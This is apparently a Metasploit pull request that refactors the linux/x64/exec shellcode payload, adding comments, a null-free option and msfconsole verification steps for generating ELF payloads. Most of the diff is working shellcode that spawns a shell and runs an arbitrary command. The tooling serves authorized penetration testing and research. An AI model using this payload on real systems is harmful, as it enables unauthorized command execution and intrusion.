### PR TITLE
payloads/x64: exec.rb - refactoring, metasm, new NullFreeVersion option

### DIFF
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -48,7 +48,7 @@ module MetasploitModule
             push rdx
             push rax
             push rsp
-            pop rdi                 ; "//bin/sh\0"
+            pop rdi                 ; "//bin/sh"
 
             push rdx
             pop rsi                 ; NULL
@@ -56,7 +56,7 @@ module MetasploitModule
             push 0x3b
             pop rax
 
-            syscall
+            syscall                 ; execve("//bin/sh", NULL, NULL)
         EOS
 
       else
@@ -67,7 +67,7 @@ module MetasploitModule
 
             push rax
             push rsp
-            pop rdi                 ; "/bin/sh\0"
+            pop rdi                 ; "/bin/sh"
 
             push rdx
             pop rsi                 ; NULL
@@ -75,7 +75,7 @@ module MetasploitModule
             push 0x3b
             pop rax
 
-            syscall
+            syscall                 ; execve("/bin/sh", NULL, NULL)
         EOS
       end
     else
@@ -106,7 +106,7 @@ module MetasploitModule
 
             jmp tocall              ; jmp/call/pop cmd address
           afterjmp:
-            pop rbp                 ; "cmd"
+            pop rbp                 ; *CMD*
 
             push rdx
             pop rbx
@@ -116,24 +116,24 @@ module MetasploitModule
             push rdx
             #{pushw_c_opt}
             push rsp
-            pop rsi                 ; "-c\0"
+            pop rsi                 ; "-c"
 
             push rdx
             push rax
             push rsp
-            pop rdi                 ; "//bin/sh\0"
+            pop rdi                 ; "//bin/sh"
 
-            push rdx
-            push rbp
-            push rsi
-            push rdi
+            push rdx                ; NULL
+            push rbp                ; *CMD*
+            push rsi                ; "-c"
+            push rdi                ; "//bin/sh"
             push rsp
-            pop rsi
+            pop rsi                 ; ["//bin/sh", "-c", "*CMD*"]
 
             push 0x3b
             pop rax
 
-            syscall
+            syscall                 ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
           tocall:
             call afterjmp
             db "#{cmd}"             ; arbitrary command
@@ -146,26 +146,26 @@ module MetasploitModule
 
             push rax
             push rsp
-            pop rdi                 ; "/bin/sh\0"
+            pop rdi                 ; "/bin/sh"
 
             push rdx
             #{pushw_c_opt}
             push rsp
-            pop rsi                 ; "-c\0"
+            pop rsi                 ; "-c"
 
-            push rdx
+            push rdx                ; NULL
             call continue
             db "#{cmd}", 0x00       ; arbitrary command
           continue:
-            push rsi
-            push rdi
+            push rsi                ; "-c"
+            push rdi                ; "/bin/sh"
             push rsp
-            pop rsi
+            pop rsi                 ; ["/bin/sh", "-c", "*CMD*"]
 
             push 0x3b
             pop rax
 
-            syscall
+            syscall                 ; execve("/bin/sh", ["/bin/sh", "-c", "*CMD*"], NULL)
         EOS
       end
     end


### PR DESCRIPTION
This PR (similar to #14661) converts shellcode to metasm and make it more efficient, resulting in its size being reduced to 37 bytes + CMD length.

It adds new behaviour to CMD option.

Now if CMD is empty or unset, a 21 byte not null-free execve payload is built.
The arbitrary command option continues the same when CMD is set.

It also adds the OptBool NullFreeVersion advanced option.

Its default value is false. When set as true, generate will output a
self included null-free version of the payload without need of encoding.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use payload/linux/x86/exec`
- [x] `options`
- [x] `advanced`
- [x] `unset CMD`
- [x] Test it `generate -f elf -o exec64.elf`
- [x] `set NullFreeVersion true`
- [x] Test it `generate -f elf -o exec64.elf`
- [x] `set NullFreeVersion false`
- [x] Set your arbitrary command `set CMD uname -a`
- [x] Test it `generate -f elf -o exec64.elf`
- [x] `set NullFreeVersion true`
- [x] Test it `generate -f elf -o exec64.elf`
